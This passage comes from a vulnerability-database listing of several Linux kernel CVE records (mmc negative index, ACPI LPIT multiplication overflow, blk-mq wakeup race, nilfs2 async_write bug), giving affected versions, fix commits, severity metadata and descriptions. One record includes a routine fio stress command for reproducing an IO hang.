{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/mmc/core/block.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b9a7339ae403035ffe7fc37cb034b36947910f68",
"status": "affected",
"version": "f49f9e802785291149bdc9c824414de4604226b4",
"versionType": "git"
},
{
"lessThan": "2b539c88940e22494da80a93ee1c5a28bbad10f6",
"status": "affected",
"version": "59020bf0999ff7da8aedcd00ef8f0d75d93b6d20",
"versionType": "git"
},
{
"lessThan": "81b8645feca08a54c7c4bf36e7b176f4983b2f28",
"status": "affected",
"version": "50b8b7a22e90bab9f1949b64a88ff17ab10913ec",
"versionType": "git"
},
{
"lessThan": "ad9cc5e9e53ab94aa0c7ac65d43be7eb208dcb55",
"status": "affected",
"version": "c4edcd134bb72b3b0acc884612d624e48c9d057f",
"versionType": "git"
},
{
"lessThan": "4466677dcabe2d70de6aa3d4bd4a4fafa94a71f2",
"status": "affected",
"version": "1653a8102868264f3488c298a9f20af2add9a288",
"versionType": "git"
},
{
"lessThan": "064db53f9023a2d5877a2d12de6bc27995f6ca56",
"status": "affected",
"version": "eed9119f8f8e8fbf225c08abdbb58597fba807e0",
"versionType": "git"
},
{
"lessThan": "7d0e8a6147550aa058fa6ade8583ad252aa61304",
"status": "affected",
"version": "4d0c8d0aef6355660b6775d57ccd5d4ea2e15802",
"versionType": "git"
},
{
"lessThan": "cf55a7acd1ed38afe43bba1c8a0935b51d1dc014",
"status": "affected",
"version": "4d0c8d0aef6355660b6775d57ccd5d4ea2e15802",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/mmc/core/block.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.8"
},
{
"lessThan": "6.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "6.1.76",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "6.6.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "6.7.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmmc: core: Avoid negative index with array access\n\nCommit 4d0c8d0aef63 (\"mmc: core: Use mrq.sbc in close-ended ffu\") assigns\nprev_idata = idatas[i - 1], but doesn\u0027t check that the iterator i is\ngreater than zero. Let\u0027s fix this by adding a check."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:05:57.228Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b9a7339ae403035ffe7fc37cb034b36947910f68"
},
{
"url": "https://git.kernel.org/stable/c/2b539c88940e22494da80a93ee1c5a28bbad10f6"
},
{
"url": "https://git.kernel.org/stable/c/81b8645feca08a54c7c4bf36e7b176f4983b2f28"
},
{
"url": "https://git.kernel.org/stable/c/ad9cc5e9e53ab94aa0c7ac65d43be7eb208dcb55"
},
{
"url": "https://git.kernel.org/stable/c/4466677dcabe2d70de6aa3d4bd4a4fafa94a71f2"
},
{
"url": "https://git.kernel.org/stable/c/064db53f9023a2d5877a2d12de6bc27995f6ca56"
},
{
"url": "https://git.kernel.org/stable/c/7d0e8a6147550aa058fa6ade8583ad252aa61304"
},
{
"url": "https://git.kernel.org/stable/c/cf55a7acd1ed38afe43bba1c8a0935b51d1dc014"
}
],
"title": "mmc: core: Avoid negative index with array access",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35813",
"datePublished": "2024-05-17T13:23:18.902Z",
"dateReserved": "2024-05-17T12:19:12.343Z",
"dateUpdated": "2025-05-04T09:05:57.228Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52683 (GCVE-0-2023-52683)
Vulnerability from cvelistv5
Published
2024-05-17 14:24
Modified
2025-05-04 07:41
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ACPI: LPIT: Avoid u32 multiplication overflow
In lpit_update_residency() there is a possibility of overflow
in multiplication, if tsc_khz is large enough (> UINT_MAX/1000).
Change multiplication to mul_u32_u32().
Found by Linux Verification Center (linuxtesting.org) with SVACE.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: eeb2d80d502af28e5660ff4bbe00f90ceb82c2db Version: eeb2d80d502af28e5660ff4bbe00f90ceb82c2db Version: eeb2d80d502af28e5660ff4bbe00f90ceb82c2db Version: eeb2d80d502af28e5660ff4bbe00f90ceb82c2db Version: eeb2d80d502af28e5660ff4bbe00f90ceb82c2db Version: eeb2d80d502af28e5660ff4bbe00f90ceb82c2db Version: eeb2d80d502af28e5660ff4bbe00f90ceb82c2db Version: eeb2d80d502af28e5660ff4bbe00f90ceb82c2db |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52683",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T19:43:59.858656Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:23:05.357Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:11:34.566Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/647d1d50c31e60ef9ccb9756a8fdf863329f7aee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6c38e791bde07d6ca2a0a619ff9b6837e0d5f9ad"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f39c3d578c7d09a18ceaf56750fc7f20b02ada63"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c1814a4ffd016ce5392c6767d22ef3aa2f0d4bd1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/72222dfd76a79d9666ab3117fcdd44ca8cd0c4de"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d1ac288b2742aa4af746c5613bac71760fadd1c4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b7aab9d906e2e252a7783f872406033ec49b6dae"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/56d2eeda87995245300836ee4dbd13b002311782"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/acpi/acpi_lpit.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "647d1d50c31e60ef9ccb9756a8fdf863329f7aee",
"status": "affected",
"version": "eeb2d80d502af28e5660ff4bbe00f90ceb82c2db",
"versionType": "git"
},
{
"lessThan": "6c38e791bde07d6ca2a0a619ff9b6837e0d5f9ad",
"status": "affected",
"version": "eeb2d80d502af28e5660ff4bbe00f90ceb82c2db",
"versionType": "git"
},
{
"lessThan": "f39c3d578c7d09a18ceaf56750fc7f20b02ada63",
"status": "affected",
"version": "eeb2d80d502af28e5660ff4bbe00f90ceb82c2db",
"versionType": "git"
},
{
"lessThan": "c1814a4ffd016ce5392c6767d22ef3aa2f0d4bd1",
"status": "affected",
"version": "eeb2d80d502af28e5660ff4bbe00f90ceb82c2db",
"versionType": "git"
},
{
"lessThan": "72222dfd76a79d9666ab3117fcdd44ca8cd0c4de",
"status": "affected",
"version": "eeb2d80d502af28e5660ff4bbe00f90ceb82c2db",
"versionType": "git"
},
{
"lessThan": "d1ac288b2742aa4af746c5613bac71760fadd1c4",
"status": "affected",
"version": "eeb2d80d502af28e5660ff4bbe00f90ceb82c2db",
"versionType": "git"
},
{
"lessThan": "b7aab9d906e2e252a7783f872406033ec49b6dae",
"status": "affected",
"version": "eeb2d80d502af28e5660ff4bbe00f90ceb82c2db",
"versionType": "git"
},
{
"lessThan": "56d2eeda87995245300836ee4dbd13b002311782",
"status": "affected",
"version": "eeb2d80d502af28e5660ff4bbe00f90ceb82c2db",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/acpi/acpi_lpit.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPI: LPIT: Avoid u32 multiplication overflow\n\nIn lpit_update_residency() there is a possibility of overflow\nin multiplication, if tsc_khz is large enough (\u003e UINT_MAX/1000).\n\nChange multiplication to mul_u32_u32().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:41:29.796Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/647d1d50c31e60ef9ccb9756a8fdf863329f7aee"
},
{
"url": "https://git.kernel.org/stable/c/6c38e791bde07d6ca2a0a619ff9b6837e0d5f9ad"
},
{
"url": "https://git.kernel.org/stable/c/f39c3d578c7d09a18ceaf56750fc7f20b02ada63"
},
{
"url": "https://git.kernel.org/stable/c/c1814a4ffd016ce5392c6767d22ef3aa2f0d4bd1"
},
{
"url": "https://git.kernel.org/stable/c/72222dfd76a79d9666ab3117fcdd44ca8cd0c4de"
},
{
"url": "https://git.kernel.org/stable/c/d1ac288b2742aa4af746c5613bac71760fadd1c4"
},
{
"url": "https://git.kernel.org/stable/c/b7aab9d906e2e252a7783f872406033ec49b6dae"
},
{
"url": "https://git.kernel.org/stable/c/56d2eeda87995245300836ee4dbd13b002311782"
}
],
"title": "ACPI: LPIT: Avoid u32 multiplication overflow",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52683",
"datePublished": "2024-05-17T14:24:46.014Z",
"dateReserved": "2024-03-07T14:49:46.887Z",
"dateUpdated": "2025-05-04T07:41:29.796Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26671 (GCVE-0-2024-26671)
Vulnerability from cvelistv5
Published
2024-04-02 06:49
Modified
2025-05-04 08:53
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
blk-mq: fix IO hang from sbitmap wakeup race
In blk_mq_mark_tag_wait(), __add_wait_queue() may be re-ordered
with the following blk_mq_get_driver_tag() in case of getting driver
tag failure.
Then in __sbitmap_queue_wake_up(), waitqueue_active() may not observe
the added waiter in blk_mq_mark_tag_wait() and wake up nothing, meantime
blk_mq_mark_tag_wait() can't get driver tag successfully.
This issue can be reproduced by running the following test in loop, and
fio hang can be observed in < 30min when running it on my test VM
in laptop.
modprobe -r scsi_debug
modprobe scsi_debug delay=0 dev_size_mb=4096 max_queue=1 host_max_queue=1 submit_queues=4
dev=`ls -d /sys/bus/pseudo/drivers/scsi_debug/adapter*/host*/target*/*/block/* | head -1 | xargs basename`
fio --filename=/dev/"$dev" --direct=1 --rw=randrw --bs=4k --iodepth=1 \
--runtime=100 --numjobs=40 --time_based --name=test \
--ioengine=libaio
Fix the issue by adding one explicit barrier in blk_mq_mark_tag_wait(), which
is just fine in case of running out of tag.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.464Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9525b38180e2753f0daa1a522b7767a2aa969676"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ecd7744a1446eb02ccc63e493e2eb6ede4ef1e10"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7610ba1319253225a9ba8a9d28d472fc883b4e2f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/89e0e66682e1538aeeaa3109503473663cd24c8b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1d9c777d3e70bdc57dddf7a14a80059d65919e56"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6d8b01624a2540336a32be91f25187a433af53a0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f1bc0d8163f8ee84a8d5affdf624cfad657df1d2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5266caaf5660529e3da53004b8b7174cab6374ed"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26671",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:53:32.693372Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:37.992Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"block/blk-mq.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9525b38180e2753f0daa1a522b7767a2aa969676",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ecd7744a1446eb02ccc63e493e2eb6ede4ef1e10",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7610ba1319253225a9ba8a9d28d472fc883b4e2f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "89e0e66682e1538aeeaa3109503473663cd24c8b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1d9c777d3e70bdc57dddf7a14a80059d65919e56",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6d8b01624a2540336a32be91f25187a433af53a0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f1bc0d8163f8ee84a8d5affdf624cfad657df1d2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5266caaf5660529e3da53004b8b7174cab6374ed",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"block/blk-mq.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-mq: fix IO hang from sbitmap wakeup race\n\nIn blk_mq_mark_tag_wait(), __add_wait_queue() may be re-ordered\nwith the following blk_mq_get_driver_tag() in case of getting driver\ntag failure.\n\nThen in __sbitmap_queue_wake_up(), waitqueue_active() may not observe\nthe added waiter in blk_mq_mark_tag_wait() and wake up nothing, meantime\nblk_mq_mark_tag_wait() can\u0027t get driver tag successfully.\n\nThis issue can be reproduced by running the following test in loop, and\nfio hang can be observed in \u003c 30min when running it on my test VM\nin laptop.\n\n\tmodprobe -r scsi_debug\n\tmodprobe scsi_debug delay=0 dev_size_mb=4096 max_queue=1 host_max_queue=1 submit_queues=4\n\tdev=`ls -d /sys/bus/pseudo/drivers/scsi_debug/adapter*/host*/target*/*/block/* | head -1 | xargs basename`\n\tfio --filename=/dev/\"$dev\" --direct=1 --rw=randrw --bs=4k --iodepth=1 \\\n \t\t--runtime=100 --numjobs=40 --time_based --name=test \\\n \t--ioengine=libaio\n\nFix the issue by adding one explicit barrier in blk_mq_mark_tag_wait(), which\nis just fine in case of running out of tag."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:53:36.352Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9525b38180e2753f0daa1a522b7767a2aa969676"
},
{
"url": "https://git.kernel.org/stable/c/ecd7744a1446eb02ccc63e493e2eb6ede4ef1e10"
},
{
"url": "https://git.kernel.org/stable/c/7610ba1319253225a9ba8a9d28d472fc883b4e2f"
},
{
"url": "https://git.kernel.org/stable/c/89e0e66682e1538aeeaa3109503473663cd24c8b"
},
{
"url": "https://git.kernel.org/stable/c/1d9c777d3e70bdc57dddf7a14a80059d65919e56"
},
{
"url": "https://git.kernel.org/stable/c/6d8b01624a2540336a32be91f25187a433af53a0"
},
{
"url": "https://git.kernel.org/stable/c/f1bc0d8163f8ee84a8d5affdf624cfad657df1d2"
},
{
"url": "https://git.kernel.org/stable/c/5266caaf5660529e3da53004b8b7174cab6374ed"
}
],
"title": "blk-mq: fix IO hang from sbitmap wakeup race",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26671",
"datePublished": "2024-04-02T06:49:13.834Z",
"dateReserved": "2024-02-19T14:20:24.150Z",
"dateUpdated": "2025-05-04T08:53:36.352Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26685 (GCVE-0-2024-26685)
Vulnerability from cvelistv5
Published
2024-04-03 14:54
Modified
2025-05-04 12:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix potential bug in end_buffer_async_write
According to a syzbot report, end_buffer_async_write(), which handles the
completion of block device writes, may detect abnormal condition of the
buffer async_write flag and cause a BUG_ON failure when using nilfs2.
Nilfs2 itself does not use end_buffer_async_write(). But, the async_write
flag is now used as a marker by commit 7f42ec394156 ("nilfs2: fix issue
with race condition of competition between segments for dirty blocks") as
a means of resolving double list insertion of dirty blocks in
nilfs_lookup_dirty_data_buffers() and nilfs_lookup_node_buffers() and the
resulting crash.
This modification is safe as long as it is used for file data and b-tree
node blocks where the page caches are independent. However, it was
irrelevant and redundant to also introduce async_write for segment summary
and super root blocks that share buffers with the backing device. This
led to the possibility that the BUG_ON check in end_buffer_async_write
would fail as described above, if independent writebacks of the backing
device occurred in parallel.
The use of async_write for segment summary buffers has already been
removed in a previous change.
Fix this issue by removing the manipulation of the async_write flag for
the remaining super root block buffer.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 7f42ec3941560f0902fe3671e36f2c20ffd3af0a Version: 7f42ec3941560f0902fe3671e36f2c20ffd3af0a Version: 7f42ec3941560f0902fe3671e36f2c20ffd3af0a Version: 7f42ec3941560f0902fe3671e36f2c20ffd3af0a Version: 7f42ec3941560f0902fe3671e36f2c20ffd3af0a Version: 7f42ec3941560f0902fe3671e36f2c20ffd3af0a Version: 7f42ec3941560f0902fe3671e36f2c20ffd3af0a Version: 7f42ec3941560f0902fe3671e36f2c20ffd3af0a Version: ccebcc74c81d8399c7b204aea47c1f33b09c2b17 Version: 831c87640d23ccb253a02e4901bd9a325b5e8c2d Version: d8974c7fe717ee8fb0706e35cc92e0bcdf660ec5 Version: 8f67918af09fc0ffd426a9b6f87697976d3fbc7b |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26685",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-03T18:35:50.019246Z",
"version": "2.0.3"
},
